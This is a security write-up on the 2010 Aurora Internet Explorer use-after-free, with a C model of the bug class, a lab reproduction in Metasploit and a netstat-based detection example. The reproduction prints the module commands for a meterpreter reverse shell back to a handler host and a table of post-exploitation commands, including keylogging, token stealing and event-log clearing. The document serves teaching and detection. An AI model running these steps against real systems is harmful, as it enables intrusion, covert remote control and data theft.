The Aurora attacks, attributed to China, were a major campaign in the recent past that used Internet Explorer exploit code to compromise companies such as Google and Adobe and succeeded in stealing intellectual property.
According to Microsoft (Security Advisory 979352, CVE-2010-0249), the vulnerability exists as an invalid pointer reference within Internet Explorer: under certain conditions the invalid pointer can be accessed after the object it refers to has been deleted, i.e. a use-after-free. In a specially crafted attack, when Internet Explorer attempts to access the freed object, it can be made to allow remote code execution.
So far the vulnerability has been exploited on IE 6. IE 7 is vulnerable as well, but at the time of writing no public exploit worked against it because of differences in IE 7's memory layout. Exploit code has been published on the internet and can be used by anyone to craft similar attacks. Metasploit, an open-source penetration-testing framework, has also released a working exploit module for this vulnerability, which is explained in detail in the last section.
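To make the bug class concrete, the following is an added example (not code from this write-up, from Microsoft or from Metasploit) that models a pointer being used after the object it referred to was deleted. A tiny fixed-slot allocator stands in for the real heap so the reuse is deterministic and nothing in the program is undefined behaviour; element_t, on_event, legit_handler and attacker_handler are invented names, and attacker_handler stands in for the payload that shellcode would run. The vulnerable sequence shows why a freed slot refilled with attacker-controlled data redirects the later virtual call; the hardened sequence shows the reference-counting discipline that prevents the object from being freed while a reference to it is still held.

```c
/* Added example, not code from the write-up or from Metasploit: a minimal model
   of the bug class Microsoft describes, a pointer still used after the object it
   referred to was deleted. A tiny slab allocator stands in for the real heap so
   the reuse is deterministic and nothing here is undefined behaviour: slot memory
   stays valid, only the ownership bookkeeping changes. All names are invented. */
#include <stdio.h>
#include <stddef.h>

typedef struct element element_t;
typedef int (*handler_fn)(element_t *self);

struct element {
    handler_fn on_event;  /* the "virtual method" reached through a stale pointer */
    int refcount;
};

static int legit_handler(element_t *self)    { (void)self; return 1; }      /* intended code path */
static int attacker_handler(element_t *self) { (void)self; return 0xBAD; }  /* stands in for the payload */

#define SLOTS 4
static element_t slab[SLOTS];
static int in_use[SLOTS];

/* First free slot, like a size-class heap bucket handing back the most recently freed chunk. */
static element_t *slab_alloc(void) {
    for (int i = 0; i < SLOTS; i++) {
        if (!in_use[i]) {
            in_use[i] = 1;
            slab[i].on_event = NULL;
            slab[i].refcount = 1;
            return &slab[i];
        }
    }
    return NULL;
}
static void slab_free(element_t *e) { in_use[e - slab] = 0; }

/* Vulnerable pattern: the owner deletes the object while a second reference
   (think of a script handler still holding a DOM element) is kept and used later. */
int vulnerable_sequence(void) {
    element_t *obj = slab_alloc();
    obj->on_event = legit_handler;
    element_t *cached = obj;          /* second, untracked reference */

    slab_free(obj);                   /* object deleted; `cached` is now dangling */

    element_t *spray = slab_alloc();  /* attacker allocation of the same size lands in the freed slot */
    spray->on_event = attacker_handler;

    int result = cached->on_event(cached);  /* "virtual call" through the stale pointer */
    slab_free(spray);
    return result;                    /* 0xBAD: control flow went where the attacker's data pointed */
}

/* Hardened pattern: every holder of a reference takes a count, so the object
   cannot be freed while `cached` still points at it, and the later allocation
   cannot land on top of it. */
static void retain(element_t *e)  { e->refcount++; }
static void release(element_t *e) { if (--e->refcount == 0) slab_free(e); }

int hardened_sequence(void) {
    element_t *obj = slab_alloc();
    obj->on_event = legit_handler;
    element_t *cached = obj;
    retain(cached);                   /* the second holder is now accounted for */

    release(obj);                     /* owner lets go: count 2 -> 1, slot stays allocated */

    element_t *spray = slab_alloc();  /* gets a different slot */
    spray->on_event = attacker_handler;

    int result = cached->on_event(cached);  /* still the legitimate handler */
    slab_free(spray);
    release(cached);                  /* last reference gone: only now is the slot freed */
    return result;                    /* 1 */
}

int main(void) {
    printf("vulnerable sequence returned 0x%x\n", vulnerable_sequence());
    printf("hardened sequence returned   %d\n", hardened_sequence());
    return 0;
}
```

Compile with any C99 compiler (cc -std=c99 uaf_model.c). The point of the two sequences is the one the Aurora exploit relies on: the browser's own code path did not change, only the contents of the memory the stale pointer refers to, which is why heap-spraying attacker-controlled data into freed slots is enough to hijack the later call.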
We reproduced the attack scenario with Metasploit and succeeded. It was quite alarming to see how the exploit works and how easily an attacker can take control of the vulnerable system.
Software used for the attack and analysis:
We set up Metasploit in one VMware image to act as the server that controls the compromised system, by issuing the following commands:
```text
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST 192.168.1.30
LHOST => 192.168.1.30
msf exploit(ie_aurora) > set LPORT 6666
LPORT => 6666
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > exploit
```
The response below shows that the malicious web server and the reverse handler were started:
```text
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started reverse handler on port 6666
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.30:8080/
[*] Server started.
```
We then opened Internet Explorer in the vulnerable system (a second VMware image running Windows XP SP2) and browsed to the server's address as printed above (http://192.168.1.30:8080/ in our case). The server end showed the following:
```text
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.1.57
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038)
```
We then issued the following command to start interacting with the exploited system:
```text
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
```
We checked the ports on the exploited system and found the connection opened by the exploit, which serves as the backdoor. A screenshot can be found below:
The port opened by Internet Explorer is shown in fig 1.1; it is the backdoor in this scenario. Because the payload is windows/meterpreter/reverse_tcp, this is not a listening port but an outbound connection from the browser process (192.168.1.57:1038 in the session output above) back to the handler on 192.168.1.30:6666, so it appears in netstat as ESTABLISHED rather than LISTENING.
Apart from that connection, there are no other indications that the computer has been compromised and can be controlled from a remote server.
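Since the only host-side indicator the write-up found is that outbound connection, the following is an added example (not part of the original report) of detection logic that scans output in the format of Windows `netstat -ano` and flags ESTABLISHED TCP connections owned by the browser's process ID whose remote port is not 80 or 443. The sample netstat lines and the PID 1524 for iexplore.exe are constructed for the example; on a real system the PID would be taken from tasklist.

```c
/* Added example, not from the original write-up: scan text in the format of
   Windows `netstat -ano` and flag ESTABLISHED TCP connections that belong to the
   browser's PID and go to a port that is not a normal web port. The sample
   output and the browser PID 1524 are constructed for this example. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

static const char *SAMPLE_NETSTAT =
    "  Proto  Local Address          Foreign Address        State           PID\n"
    "  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       928\n"
    "  TCP    192.168.1.57:1037      192.168.1.30:80        ESTABLISHED     1524\n"
    "  TCP    192.168.1.57:1038      192.168.1.30:6666      ESTABLISHED     1524\n"
    "  UDP    0.0.0.0:445            *:*                                    4\n";

/* Port number from "host:port"; -1 when there is none (e.g. "*:*"). */
static int remote_port(const char *addr) {
    const char *colon = strrchr(addr, ':');
    if (colon == NULL || colon[1] == '\0') return -1;
    char *end;
    long port = strtol(colon + 1, &end, 10);
    if (*end != '\0' || port < 0 || port > 65535) return -1;
    return (int)port;
}

static int is_web_port(int port) { return port == 80 || port == 443; }

/* Returns the number of suspicious connections found; prints each one.
   Header, LISTENING and UDP lines fail the five-field parse or the state
   check and are skipped. */
int count_suspicious(const char *netstat, int browser_pid) {
    int hits = 0;
    const char *line = netstat;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[256];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';

        char proto[16], local[64], foreign[64], state[16];
        int pid;
        if (sscanf(buf, "%15s %63s %63s %15s %d", proto, local, foreign, state, &pid) == 5
            && strcmp(proto, "TCP") == 0
            && strcmp(state, "ESTABLISHED") == 0
            && pid == browser_pid
            && !is_web_port(remote_port(foreign))) {
            printf("suspicious: PID %d %s -> %s\n", pid, local, foreign);
            hits++;
        }
        if (!nl) break;
        line = nl + 1;
    }
    return hits;
}

int main(void) {
    int n = count_suspicious(SAMPLE_NETSTAT, 1524);
    printf("%d suspicious connection(s) for the browser PID\n", n);
    return 0;
}
```

On the constructed sample only the connection to 192.168.1.30:6666 is reported. Two caveats for real use: a handler can just as well listen on 80 or 443, so the port filter only catches the lazy case, and the migrate command in the table below moves the meterpreter session into another process, after which the connection no longer belongs to the browser's PID at all.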
It is striking how completely a compromised computer can be controlled. An example of the shell being controlled from the server can be seen below:
The following is the meterpreter help output, listing the commands that can be used to control the compromised system, including the shell command that drops into a system command shell on the victim.
Core Commands
=============
| Command | Description |
| ------- | ----------- |
| ? | Help menu |
| background | Backgrounds the current session |
| channel | Displays information about active channels |
| close | Closes a channel |
| exit | Terminate the meterpreter session |
| help | Help menu |
| interact | Interacts with a channel |
| irb | Drop into irb scripting mode |
| migrate | Migrate the server to another process |
| quit | Terminate the meterpreter session |
| read | Reads data from a channel |
| run | Executes a meterpreter script |
| use | Load one or more meterpreter extensions |
| write | Writes data to a channel |
Stdapi: File system Commands
============================
| Command | Description |
| ------- | ----------- |
| cat | Read the contents of a file to the screen |
| cd | Change directory |
| del | Delete the specified file |
| download | Download a file or directory |
| edit | Edit a file |
| getlwd | Print local working directory |
| getwd | Print working directory |
| lcd | Change local working directory |
| lpwd | Print local working directory |
| ls | List files |
| mkdir | Make directory |
| pwd | Print working directory |
| rm | Delete the specified file |
| rmdir | Remove directory |
| upload | Upload a file or directory |
Stdapi: Networking Commands
===========================
| Command | Description |
| ------- | ----------- |
| ipconfig | Display interfaces |
| portfwd | Forward a local port to a remote service |
| route | View and modify the routing table |
Stdapi: System Commands
=======================
| Command | Description |
| ------- | ----------- |
| clearev | Clear the event log |
| drop_token | Relinquishes any active impersonation token. |
| execute | Execute a command |
| getpid | Get the current process identifier |
| getprivs | Get as many privileges as possible |
| getuid | Get the user that the server is running as |
| kill | Terminate a process |
| ps | List running processes |
| reboot | Reboots the remote computer |
| reg | Modify and interact with the remote registry |
| rev2self | Calls RevertToSelf() on the remote machine |
| shell | Drop into a system command shell |
| shutdown | Shuts down the remote computer |
| steal_token | Attempts to steal an impersonation token from the target process |
| sysinfo | Gets information about the remote system, such as OS |
Stdapi: User interface Commands
===============================
| Command | Description |
| ------- | ----------- |
| enumdesktops | List all accessible desktops and window stations |
| idletime | Returns the number of seconds the remote user has been idle |
| keyscan_dump | Dump the keystroke buffer |
| keyscan_start | Start capturing keystrokes |
| keyscan_stop | Stop capturing keystrokes |
| setdesktop | Move to a different workstation and desktop |
| uictl | Control some of the user interface components |
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://www.microsoft.com/technet/security/advisory/979352.mspx